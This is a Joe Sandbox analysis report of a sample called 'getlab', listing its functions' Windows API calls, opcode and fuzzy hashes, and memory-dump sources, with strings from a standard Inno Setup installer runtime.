                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                                          • Instruction ID: 582242be021ecdaa9f487f520a6273a00fb8a2f6ff7a96cbd182f7b59f56d267
                                                                          • Opcode Fuzzy Hash: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                                          • Instruction Fuzzy Hash: 9EC08CE03222101A9E1069BD2CC521F46C8891823A3A41E3BB528E72D2E23D88262818
                                                                          Function 00406EB0 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8BC,0040CE68,?,00000000,?), ref: 00406ECD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                          • Opcode Fuzzy Hash: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                          Function 00450900 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                            • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                                          • Instruction ID: b7b79c15840fa76abef9437e43e4f8825fb2e58c400bd883dda953f657da4aaf
                                                                          • Opcode Fuzzy Hash: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                                          • Instruction Fuzzy Hash: A9C09BB93011158BDF50E6FEC5C1D0763DC6F5C30A7514166BD04CF207E668DC154B18
                                                                          Function 00407298 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory
                                                                          • String ID:
                                                                          • API String ID: 1611563598-0
                                                                          • Opcode ID: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                                          • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                          • Opcode Fuzzy Hash: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                                          • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                          Function 0042E3E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                                          • Instruction ID: 0a31ae7c3a111c16d424c34ef622fbdc70eb0dd2bd2df7fa5b045972c40067f9
                                                                          • Opcode Fuzzy Hash: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                                          • Instruction Fuzzy Hash: C5B09B7670C6105DA719DED5B45552D63D4D7C47207E14477F000D2581D97C58014A18
                                                                          Function 004165E4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                          • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                          • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                          • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                          Function 00448720 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                                          • Instruction ID: 536338a183f72747ee396c39aaf2d9ae1316c242f91420f2fc1fbbab771670b7
                                                                          • Opcode Fuzzy Hash: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                                          • Instruction Fuzzy Hash: 73519770E042099FEB00EFA5C892AAEBBF5EF49714F50417AE504E7351DB389E41CB98
                                                                          Function 0047D57C Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047D754,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047D70E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 626452242-0
                                                                          • Opcode ID: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                                          • Instruction ID: ceed5698e636368dfd76c0cd730b865cf5009e2f8cb46b99e2292a0b329ee420
                                                                          • Opcode Fuzzy Hash: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                                          • Instruction Fuzzy Hash: 7C518170A14245AFDB20DF55D8C5BAABBF9EF29304F108077E808A73A1C778AD45CB59
                                                                          Function 0041F3BC Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                          • Instruction ID: cb23d80071df23bba1d133aab7454d5b1bd3cce231e0a29d7ee5219cf2fb9859
                                                                          • Opcode Fuzzy Hash: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                          • Instruction Fuzzy Hash: 08115A752407059BDB10DF19D880B86FBE5EF58350F10C53BE9A88B385D374E84ACBA9
                                                                          Function 00452F98 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00453001), ref: 00452FE3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                                          • Instruction ID: 3c34fb880e90b623eb2bb31e9ea66b18baec95e7b0c87dab0e1dfc6834c7d9d6
                                                                          • Opcode Fuzzy Hash: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                                          • Instruction Fuzzy Hash: 98014C356042046A8B15DF699C008AEFBE8EB4E72175046B7FC24D3382D6344E059798
                                                                          Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000012B0,000052B3,00401973), ref: 00401766
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                          • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                          • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                          • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                          Function 00406F38 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                          • Opcode Fuzzy Hash: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                                          • Instruction Fuzzy Hash:

                                                                          Non-executed Functions

                                                                          Function 0041F110 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                          • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                          • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                          • API String ID: 2323315520-3614243559
                                                                          • Opcode ID: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                                          • Instruction ID: b3d5d35426b7a88a41f50cbf902c37b37573112488e24e2852513ec86d1b0e77
                                                                          • Opcode Fuzzy Hash: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                                          • Instruction Fuzzy Hash: 1F3150B2600700ABEB01EBB9AC46A6B3794F728324751093FB508D72A2E77C5C55CF5C
                                                                          Function 004583E8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0045844F
                                                                          • QueryPerformanceCounter.KERNEL32(02153858,00000000,004586E2,?,?,02153858,00000000,?,00458DDE,?,02153858,00000000), ref: 00458458
                                                                          • GetSystemTimeAsFileTime.KERNEL32(02153858,02153858), ref: 00458462
                                                                          • GetCurrentProcessId.KERNEL32(?,02153858,00000000,004586E2,?,?,02153858,00000000,?,00458DDE,?,02153858,00000000), ref: 0045846B
                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02153858,02153858), ref: 004584EF
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                                          • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                          • API String ID: 770386003-3271284199
                                                                          • Opcode ID: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                                          • Instruction ID: 5a0611516353431e4aeb24f6ab6c42495b14cb215b8b3d0382893c99e5952ef8
                                                                          • Opcode Fuzzy Hash: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                                          • Instruction Fuzzy Hash: E8711370A003449EDB11DF65CC41B9E7BF8EB19305F1085BAF958FB282DB7899448F69
                                                                          Function 00477F98 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                            • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                            • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                            • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0), ref: 00477E60
                                                                            • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                            • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,02152BD0,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                                          • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
                                                                          • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
